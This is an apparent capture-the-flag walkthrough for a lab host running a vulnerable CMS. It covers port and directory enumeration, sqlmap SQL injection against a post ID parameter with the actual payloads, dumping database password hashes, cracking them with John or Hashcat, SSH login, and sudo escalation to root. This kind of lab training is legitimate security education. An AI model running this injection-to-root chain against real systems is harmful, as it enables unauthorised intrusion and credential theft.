creator: parrotassasin15
Difficulty: Medium
Category: SQL Injection
Link: parrot-ctfs.com/hacking/labs/1
Host: 10.14.0.71
Objectives:
Obtain user & root flags
Complete all questions
Description:
Can you find the vulnerabilities in this CMS? If so, be sure to report them to their GitHub.
Set up
Before engaging anything, connect or download your free VPN pack from the VPN tab.
After downloading your VPN pack, start the VPN using the following command:
sudo open path/to/vpn
most of the time it should be in your Downloads folder, here is the syntax:
sudo openvpn /Downloads/name.ovpn
After that, you can ping the host to ensure it's running.
Enumeration
Let's dive in with a quick nmap scan since we know we are dealing with a CMS and it's vulnerable to SQL Injection according to the machine category and description we should know which specific port the CMS is running on and get an insight into which more ports are open.
nmap 10.14.0.71
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 15:24
Nmap scan report for aero (10.14.0.71)
Host is up (0.23s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
Without wasting any time, we need the CMS version running on port 80 and the GitHub repository of the CMS.
We can browse on port 80 using Firefox or your favorite browser and see if there is a CMS version/GitHub link mentioned anywhere.
A common place to look: the footer of the page, source code comments, and maybe response headers. We can also use the Wappalyzer extension to check the technology stack.
After trying all of the above methods, I didn't succeed to get the version but I got the developer name in the default page footer. Guess we will have to settle with a simple Google search after all.
So we have the repo this should lead us to the version and maybe other juicy stuff. After checking the latest commits, we get that the latest version is v0.0.1 there is still another easier way of getting the version that I can't remember correctly.
Now that we have the CMS version, should we fire up Neesus and Metasploit and pwn the mainframe? NO.
How can we use this version number and GitHub repo?:
Search for known vulnerabilities associated with the version(which we already know it's SQLi)
Check if we can find default credentials in the GitHub repo
At this point, we know that Aero CMS v0.0.1 is vulnerable to SQL injection but where does it occur? back to the drawing board, we need to enumerate the webpage to see where the vulnerability occurs.
To achieve this we can start by fuzzing for any endpoints or paths using Gobuster, Feroxbuster, or FFUF. let's use Feroxbuster & FFUF recursively and simultaneously because why not.
Here is the syntax for both:
feroxbuster --url http://10.14.0.71/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak
ffuf -u "http://10.14.0.71/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js -c
This is what we will get after running either of the above commands:
──────────────────────────────────────────────────
301 9l 28w 309c http://10.14.0.71/images
200 181l 371w 6171c http://10.14.0.71/search.php
200 233l 484w 0c http://10.14.0.71/index.php
302 179l 371w 6137c http://10.14.0.71/category.php
301 9l 28w 308c http://10.14.0.71/admin
301 9l 28w 315c http://10.14.0.71/admin/images
302 293l 627w 0c http://10.14.0.71/admin/index.php
200 138l 308w 4778c http://10.14.0.71/registration.php
302 192l 464w 7470c http://10.14.0.71/admin/comments.php
302 194l 458w 7933c http://10.14.0.71/admin/users.php
301 9l 28w 311c http://10.14.0.71/includes
200 1l 0w 1c http://10.14.0.71/includes/login.php
301 9l 28w 312c http://10.14.0.71/admin/css
200 31l 88w 988c http://10.14.0.71/includes/header.php
301 9l 28w 317c http://10.14.0.71/admin/includes
302 44l 94w 1275c http://10.14.0.71/admin/includes/header.php
301 9l 28w 313c http://10.14.0.71/javascript
301 9l 28w 308c http://10.14.0.71/fonts
Sweet, looking at that output we can see that there is an admin panel, search panel, and other good stuff like PhpMyadmin .
Remember that we can get the default username and password on the GitHub repo or on our target's homepage which is Username: admin and Password: password
With those credentials, we can edit posts on the blog, add users, and give them permission but that's not our goal, we need to know where the SQLi occurs.
Okay so, this is what we have so far on the blog paths:
/search.php
/login.php
/post.php
/admin.php
/category.php
-------snip--------
Well, this is where we channel our inner 1337_h4x0r moment.
Exploitation
We can fire up the old reliable sqlmap or decide to do the injection manually on the following endpoints:
category.php?category=1
post.php?p_id=1
If you browse all the paths properly, it is like a buffet of taking user input.
As a hater and an elite hacker man, we are going to target http://10.14.0.71/post.php?p_id=1 . there are other parts we can test for SQL injection like the search bar using Burp suite but let's stick with /post.php?p_id=1
Let's craft the sqlmap syntax to trigger the vulnerability.
sqlmap -u http://10.14.0.71/post.php?p_id=1 --dbms mysql --level 3 --risk 3
We are using the --dbms tag because we already know the Database runs on MySQL because of the info we got from the Wappalyzer extension.
After running the above command we get the following output from sqlmap :
---
Parameter: p_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p_id=1 AND 5165=5165
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p_id=1 AND (SELECT 9525 FROM (SELECT(SLEEP(5)))Yhmj)
---
We are golden!!, p_id parameter it is. Now it's time to get the credz
Time to dump some more info and see what we will work with. Take this syntax and slap it right on the terminal:
sqlmap -u http://10.14.0.71/post.php?p_id=1 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
It would be quicker if we dump info one by one from the Database name to all Columns
database management system users [7]:
[*] 'debian-sys-maint'@'localhost'
[*] 'mysql.infoschema'@'localhost'
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'neil'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'localhost'
Oooow, look at that Neil guy He looks famous I wonder what He did back then We won't mind getting His password hash
sqlmap -u http://10.14.0.71/post.php?p_id=1 -p p_id -D aerocms -T users -C user_id,username,password --dump --threads=6
From here we can use John the Ripper or Hashcat to crack the above hashes using the rockyou.txt wordlist.
john neil.hash --wordlist=/home/xi/rockyou.txt
Then: john neil.hash --show
Or Hashcat: hashcat -m 3200 neil.hash rockyou.txt where
After retrieving the password for the user neil we can use it to log in to the blog but let's see if the password can work on SSH running on port 22.
ssh neil@10.14.0.71
In our case we get SSH access using the cracked password, now we can get and submit the user.txt
neil@space:~$ cat user.txt
76*************************************fff
neil@space:~$
root.txt
First, we run the command sudo -l to check what our user neil can run on the machine
neil@space:~$ sudo -l
Matching Defaults entries for neil on space:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User neil may run the following commands on space:
(ALL : ALL) ALL
neil@space:~$
This should be easy as sudo su
neil@space:~$ sudo su
root@space:/home/neil# cd ~
root@space:~# cat root.txt
2024****************************5602
root@space:~#
GGs